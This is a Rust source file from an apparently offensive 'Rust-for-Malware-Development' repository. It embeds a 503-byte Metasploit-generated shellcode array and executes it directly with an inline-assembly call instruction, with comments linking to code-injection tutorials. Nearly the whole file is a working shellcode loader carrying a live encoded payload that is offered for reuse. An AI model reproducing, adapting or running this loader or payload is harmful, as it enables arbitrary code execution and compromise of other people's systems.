-
Notifications
You must be signed in to change notification settings - Fork 184
/
inline_assembly.rs
76 lines (68 loc) · 3.75 KB
/
inline_assembly.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/*
Execute shellcode with inline assembly...
For more codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
Resources Used:
* https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-inline-assembly-in-c-c++
* https://cocomelonc.github.io/tutorial/2021/12/03/inline-asm-1.html
@5mukx
*/
use std::arch::asm;
#[cfg(target_os="windows")]
fn main(){
#![link_section = ".text"]
// msfshellcode ..
let shellcode: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
0x9a,0xfa,0x6a,0xf2,0x06,0xd6,0x98,0x59,0x48,0x31,0x58,0x27,
0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x66,0xb2,0xe9,0x16,
0xf6,0x3e,0x58,0x59,0x9a,0xfa,0x2b,0xa3,0x47,0x86,0xca,0x08,
0xcc,0xb2,0x5b,0x20,0x63,0x9e,0x13,0x0b,0xfa,0xb2,0xe1,0xa0,
0x1e,0x9e,0x13,0x0b,0xba,0xb2,0xe1,0x80,0x56,0x9e,0x97,0xee,
0xd0,0xb0,0x27,0xc3,0xcf,0x9e,0xa9,0x99,0x36,0xc6,0x0b,0x8e,
0x04,0xfa,0xb8,0x18,0x5b,0x33,0x67,0xb3,0x07,0x17,0x7a,0xb4,
0xc8,0xbb,0x3b,0xba,0x8d,0x84,0xb8,0xd2,0xd8,0xc6,0x22,0xf3,
0xd6,0x5d,0x18,0xd1,0x9a,0xfa,0x6a,0xba,0x83,0x16,0xec,0x3e,
0xd2,0xfb,0xba,0xa2,0x8d,0x9e,0x80,0x1d,0x11,0xba,0x4a,0xbb,
0x07,0x06,0x7b,0x0f,0xd2,0x05,0xa3,0xb3,0x8d,0xe2,0x10,0x11,
0x9b,0x2c,0x27,0xc3,0xcf,0x9e,0xa9,0x99,0x36,0xbb,0xab,0x3b,
0x0b,0x97,0x99,0x98,0xa2,0x1a,0x1f,0x03,0x4a,0xd5,0xd4,0x7d,
0x92,0xbf,0x53,0x23,0x73,0x0e,0xc0,0x1d,0x11,0xba,0x4e,0xbb,
0x07,0x06,0xfe,0x18,0x11,0xf6,0x22,0xb6,0x8d,0x96,0x84,0x10,
0x9b,0x2a,0x2b,0x79,0x02,0x5e,0xd0,0x58,0x4a,0xbb,0x32,0xb3,
0x5e,0x88,0xc1,0x03,0xdb,0xa2,0x2b,0xab,0x47,0x8c,0xd0,0xda,
0x76,0xda,0x2b,0xa0,0xf9,0x36,0xc0,0x18,0xc3,0xa0,0x22,0x79,
0x14,0x3f,0xcf,0xa6,0x65,0x05,0x37,0xbb,0xb8,0xa1,0xeb,0x6b,
0xc5,0xc9,0x58,0xf2,0x06,0x97,0xce,0x10,0x13,0x1c,0x22,0x73,
0xea,0x76,0x99,0x59,0x9a,0xb3,0xe3,0x17,0x4f,0x6a,0x9a,0x59,
0x9b,0x41,0xaa,0x5a,0x07,0x9d,0xd9,0x0d,0xd3,0x73,0x8e,0xbe,
0x8f,0x27,0xd9,0xe3,0xd6,0x8d,0x4c,0xf5,0xf9,0x03,0xd4,0xd0,
0x70,0x92,0x6b,0xf3,0x06,0xd6,0xc1,0x18,0x20,0xd3,0xea,0x99,
0x06,0x29,0x4d,0x09,0xca,0xb7,0x5b,0x3b,0x4b,0xe7,0x58,0x11,
0x65,0x3a,0x22,0x7b,0xc4,0x9e,0x67,0x99,0xd2,0x73,0xab,0xb3,
0xbc,0x3c,0x97,0x86,0x7a,0x05,0xbf,0xba,0x8f,0x11,0xf2,0x49,
0xdb,0xa2,0x26,0x7b,0xe4,0x9e,0x11,0xa0,0xdb,0x40,0xf3,0x57,
0x72,0xb7,0x67,0x8c,0xd2,0x7b,0xae,0xb2,0x04,0xd6,0x98,0x10,
0x22,0x99,0x07,0x96,0x06,0xd6,0x98,0x59,0x9a,0xbb,0x3a,0xb3,
0x56,0x9e,0x11,0xbb,0xcd,0xad,0x3d,0xbf,0x37,0x16,0xf2,0x54,
0xc3,0xbb,0x3a,0x10,0xfa,0xb0,0x5f,0x1d,0xbe,0xae,0x6b,0xf3,
0x4e,0x5b,0xdc,0x7d,0x82,0x3c,0x6a,0x9a,0x4e,0x5f,0x7e,0x0f,
0xca,0xbb,0x3a,0xb3,0x56,0x97,0xc8,0x10,0x65,0x3a,0x2b,0xa2,
0x4f,0x29,0x50,0x14,0x13,0x3b,0x26,0x7b,0xc7,0x97,0x22,0x20,
0x56,0xc5,0xec,0x0d,0xd3,0x9e,0xa9,0x8b,0xd2,0x05,0xa0,0x79,
0x08,0x97,0x22,0x51,0x1d,0xe7,0x0a,0x0d,0xd3,0x6d,0x68,0xec,
0x38,0xac,0x2b,0x48,0xa0,0x43,0x25,0xc4,0x65,0x2f,0x22,0x71,
0xc2,0xfe,0xa4,0x5f,0xe6,0xf0,0xea,0x09,0xe6,0xa3,0x9d,0xe2,
0xdd,0xe9,0x18,0x9d,0x6c,0xd6,0xc1,0x18,0x13,0x20,0x95,0x27,
0x06,0xd6,0x98,0x59];
// This will works ..
// convert the shellcode into binary format (.bin) and read it using include_bytes()..
//Example
// let shellcode = include_bytes!("msfshellcode_payload.bin");
// let shellcode_bytes = include_bytes!(shellcode);
unsafe{
asm!("call {}", in(reg) shellcode.as_ptr())
}
// If you try to execute the program with 'char' shellcode.
// You will get an error (exit code: 0xc0000005, STATUS_ACCESS_VIOLATION)
//Because you did not have permission to accress the memory that you wanted to access.
}